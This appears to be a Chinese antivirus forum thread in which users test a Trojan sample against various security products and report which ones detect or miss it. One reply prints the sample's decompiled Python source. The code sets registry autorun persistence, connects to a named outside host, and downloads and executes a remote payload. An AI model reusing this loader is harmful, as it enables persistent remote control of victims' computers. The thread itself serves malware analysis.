查看: 1293|回复: 10
收起左侧

[病毒样本] 1X

[复制链接]
hsks
发表于 2023-2-5 17:28:46 | 显示全部楼层 |阅读模式
秋日之殇
发表于 2023-2-5 17:41:08 | 显示全部楼层
事件: 检测到恶意对象
应用程序: main_code.exe
用户: DESKTOP-MQPTK29\lybing
用户类型: 发起者
组件: 系统监控
结果说明: 检测到
类型: 木马
名称: PDM:Trojan.Win32.Generic
威胁级别: 高
对象类型: 进程
对象路径: C:\Users\lybing\Desktop\main_code
对象名称: main_code.exe
原因: 行为分析
数据库发布日期: 今天,2023/2/5 9:27:00
MD5: E959D4EAB2BC3A03E16A2679AFBB6FD1
dght432
发表于 2023-2-5 17:45:48 | 显示全部楼层
就拦截了个开机启动项......

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
PianoA
发表于 2023-2-5 17:54:34 | 显示全部楼层
金山毒霸miss
Shake2333
发表于 2023-2-5 19:15:26 | 显示全部楼层
McAfee双击miss
Anmoe
发表于 2023-2-5 19:50:36 | 显示全部楼层
BEST ATC

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
熊小度
发表于 2023-2-5 21:00:19 | 显示全部楼层
腾管 kill
aboringman
发表于 2023-2-5 23:24:20 | 显示全部楼层
Avast:0

过CC(



被添加了自启动项(悲)



运行一段时间后自退。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
popk
发表于 2023-2-6 09:07:56 | 显示全部楼层
  1. # Source Generated with Decompyle++
  2. # File: main_code.pyc (Python 3.7)

  3. '''
  4. \xe4\xbd\x9c\xe8\x80\x85\xef\xbc\x9aVMWARE\xe5\x87\xba\xe7\x94\x9f\xe6\x9c\xba\tQ:SU-BM
  5. \xe6\x97\xb6\xe9\x97\xb4\xef\xbc\x9a\xe5\x88\x9d\xe9\x9f\xb3\xe7\xba\xaa\xe5\x85\x8311\xe5\xb9\xb44\xe6\x9c\x885\xe6\x97\xa514\xe6\x97\xb6
  6. '''
  7. import struct
  8. import time
  9. import socket
  10. import zlib
  11. import base64
  12. import win32api
  13. import win32con
  14. import winreg
  15. import os

  16. def Judge_Key(key_name, reg_root, reg_path = (win32con.HKEY_CURRENT_USER, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run')):
  17.     '''
  18.     :param key_name: #  \xe8\xa6\x81\xe6\x9f\xa5\xe8\xaf\xa2\xe7\x9a\x84\xe9\x94\xae\xe5\x90\x8d
  19.     :param reg_root: # \xe6\xa0\xb9\xe8\x8a\x82\xe7\x82\xb9
  20. #win32con.HKEY_CURRENT_USER
  21. #win32con.HKEY_CLASSES_ROOT
  22. #win32con.HKEY_CURRENT_USER
  23. #win32con.HKEY_LOCAL_MACHINE
  24. #win32con.HKEY_USERS
  25. #win32con.HKEY_CURRENT_CONFIG
  26.     :param reg_path: #  \xe9\x94\xae\xe7\x9a\x84\xe8\xb7\xaf\xe5\xbe\x84
  27.     :return:feedback\xe6\x98\xaf\xef\xbc\x880/1/2/3\xef\xbc\x9a\xe5\xad\x98\xe5\x9c\xa8/\xe4\xb8\x8d\xe5\xad\x98\xe5\x9c\xa8/\xe6\x9d\x83\xe9\x99\x90\xe4\xb8\x8d\xe8\xb6\xb3/\xe6\x8a\xa5\xe9\x94\x99\xef\xbc\x89
  28.     '''
  29.     reg_flags = win32con.WRITE_OWNER | win32con.KEY_WOW64_64KEY | win32con.KEY_ALL_ACCESS
  30.    
  31.     try:
  32.         key = winreg.OpenKey(reg_root, reg_path, 0, reg_flags)
  33.         (location, type) = winreg.QueryValueEx(key, key_name)
  34.         feedback = 0
  35.     except FileNotFoundError:
  36.         e = None
  37.         
  38.         try:
  39.             feedback = 1
  40.         finally:
  41.             e = None
  42.             del e

  43.     except PermissionError:
  44.         e = None
  45.         
  46.         try:
  47.             feedback = 2
  48.         finally:
  49.             e = None
  50.             del e

  51.     except:
  52.         feedback = 3

  53.     return feedback


  54. def AutoRun(switch, zdynames, current_file, abspath = ('open', None, None, os.path.abspath(os.path.dirname(__file__)))):
  55.     path = abspath + '\\' + zdynames
  56.     judge_key = Judge_Key(win32con.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', current_file, **('reg_root', 'reg_path', 'key_name'))
  57.     KeyName = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
  58.     key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, KeyName, 0, win32con.KEY_ALL_ACCESS)
  59.     if switch == 'open':
  60.         
  61.         try:
  62.             if judge_key == 0:
  63.                 pass
  64.             elif judge_key == 1:
  65.                 win32api.RegSetValueEx(key, current_file, 0, win32con.REG_SZ, path)
  66.                 win32api.RegCloseKey(key)

  67.     elif switch == 'close':
  68.         
  69.         try:
  70.             if judge_key == 0:
  71.                 win32api.RegDeleteValue(key, current_file)
  72.                 win32api.RegCloseKey(key)
  73.             elif judge_key == 1:
  74.                 pass
  75.             elif judge_key == 2:
  76.                 pass
  77.         except:
  78.             pass


  79. AutoRun('open', 'main_code.exe', 'main_code', os.path.abspath(os.path.dirname(__file__)), **('switch', 'zdynames', 'current_file', 'abspath'))
  80. for x in range(10):
  81.    
  82.     try:
  83.         s = socket.socket(2, socket.SOCK_STREAM)
  84.         s.connect(('free.svipss.top', 53353))
  85.     continue
  86.     time.sleep(5)
  87.     continue


  88. l = struct.unpack('>I', s.recv(4))[0]
  89. d = s.recv(l)
  90. while len(d) < l:
  91.     d += s.recv(l - len(d))
  92. exec(zlib.decompress(base64.b64decode(d)), {
  93.     's': s })
复制代码
lip123
发表于 2023-2-6 09:59:56 | 显示全部楼层
火绒miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 14:28 , Processed in 0.184965 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表